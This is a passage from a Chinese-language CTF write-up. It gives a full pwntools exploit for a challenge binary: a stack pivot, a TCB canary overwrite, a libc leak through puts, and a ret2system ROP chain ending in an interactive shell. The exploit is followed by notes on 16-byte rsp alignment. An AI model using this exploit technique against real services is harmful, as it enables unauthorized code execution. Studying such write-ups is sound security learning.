其实在exp中要解决这个问题也简单，只需要在最终的payload中添加一个ret的gadget就可以了

最终版如下

#!/usr/bin/python

from pwn import *

context.os = 'linux'
#context.terminal = ['tmux', 'splitw', '-h']
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'DEBUG'

libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
bin_path = './bs'

libc = ELF(libc_path)
binary = ELF(bin_path)

host = ''
port = 6666


def debug(command=''):
    gdb.attach(p, command)


def exploit():
    # debug('b *0x4009E7\n')
    g = lambda x: next(binary.search(asm(x, os='linux', arch='amd64')))
    pop_rdi = g('pop rdi; ret')
    pop_rsi_pop = g('pop rsi; pop r15; ret')
    leave = g('leave; ret')
    ret = 0x0000000000400287
    log.info("pop_rdi:     " + hex(pop_rdi))
    log.info("pop_rsi_pop: " + hex(pop_rsi_pop))
    log.info("leave:       " + hex(leave))

    size = 0x1850
    p.sendlineafter('send?\n', str(size))

    fakebuf = 0x602f00
    payload = ''
    payload += 'A' * 0x1010
    # stack pivot #step 1
    payload += p64(fakebuf)
    # ROP1 - leak libc
    payload += p64(pop_rdi)
    payload += p64(binary.got['puts'])
    payload += p64(binary.plt['puts'])
    # ROP2 - read
    payload += p64(pop_rdi)
    payload += p64(0)
    payload += p64(pop_rsi_pop)
    payload += p64(fakebuf)
    payload += p64(0)
    payload += p64(binary.plt['read'])
    # stack pivot #step 2
    payload += p64(leave)
    # Override TCB Canary
    payload = payload.ljust(size, 'A')
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.send(payload)
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.recvuntil('goodbye.\n')
    leak = p.recv(6)+'\x00\x00'
    leak = u64(leak)
    #info("libc.address is %#x", libc.address)
    #print("leak:", leak)
    #print("sym:", libc.symbols['puts'])
    libc.address = leak - libc.symbols['puts']

    #print("leak:",leak)
    #print("sym:",libc.symbols['puts'])
    info("libc.address is %#x", libc.address)
    bin_sh = libc.search('/bin/sh').next()
    system = libc.sym['system']

    #payload = ''
    #payload += p64(0)
    #payload += p64((libc.address+0x4f3c2))
    payload = ''
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(ret)
    payload += p64(system)

    p.send(payload)
    #print ("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.interactive()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        global p
        p = process(executable=bin_path, argv=[bin_path])  # , env={'LD_PRELOAD':libc_path})
    else:
        p = remote(sys.argv[1], int(sys.argv[2]))
    exploit()

运行后如下：

pwn

可以看到，成功getshell

另外，对于上面所提到的rsp需要对齐16字节的问题，摘录一段NASM的原话如下

1
2
3

The stack pointer %rsp must be aligned to a 16-byte boundary before making a call. 
Fine, but the process of making a call pushes the return address (8 bytes) on the stack,so when a function gets control, %rsp is not aligned. 
You have to make that extra space yourself, by pushing something or subtracting 8 from %rsp.

Linus在邮件中也提到

On Tue, Jan 10, 2017 at 7:30 PM, Linus Torvalds
<torvalds@linux-foundation.org> wrote:
>
> If you really want more stack alignment, you have to generate that
> alignment yourself by hand (and have a bigger buffer that you do that
> alignment inside).

Side note: gcc can (and does) actually generate forced alignment using
"and" instructions on %rsp rather than assuming pre-existing
alignment.  And that would be valid.

The problem with "alignof(16)" is not that gcc couldn't generate the
alignment itself, it's just the broken "it's already aligned to 16
bytes" assumption because -mpreferred-stack-boundary=3 doesn't work.

You *could* try to hack around it by forcing a 32-byte alignment
instead. That (I think) will make gcc generate the "and" instruction
mess.

And it shouldn't actually use any more memory than doing it by hand
(by having twice the alignment and hand-aligning the pointer).

So we *could* try to just have a really hacky rule saying that you can
align stack data to 8 or 32 bytes, but *not* to 16 bytes.

That said, I do think that the "don't assume stack alignment, do it by
hand" may be the safer thing. Because who knows what the random rules
will be on other architectures.

               Linus
--

由于没有调试kernel,所以我暂且把这里的call认为其包含syscall系统调用，所以在call函数之前，必须保证rsp对齐，否则就有可能出现不可预期的错误

结语

64位下的pwn还是有很多需要注意的点，另外后面会尝试进一步调试kernel，看看syscall 0x38后到底是哪里由于rsp没有对齐造成了异常退出(估计多半也是像movaps之类的指令hh，权当猜测)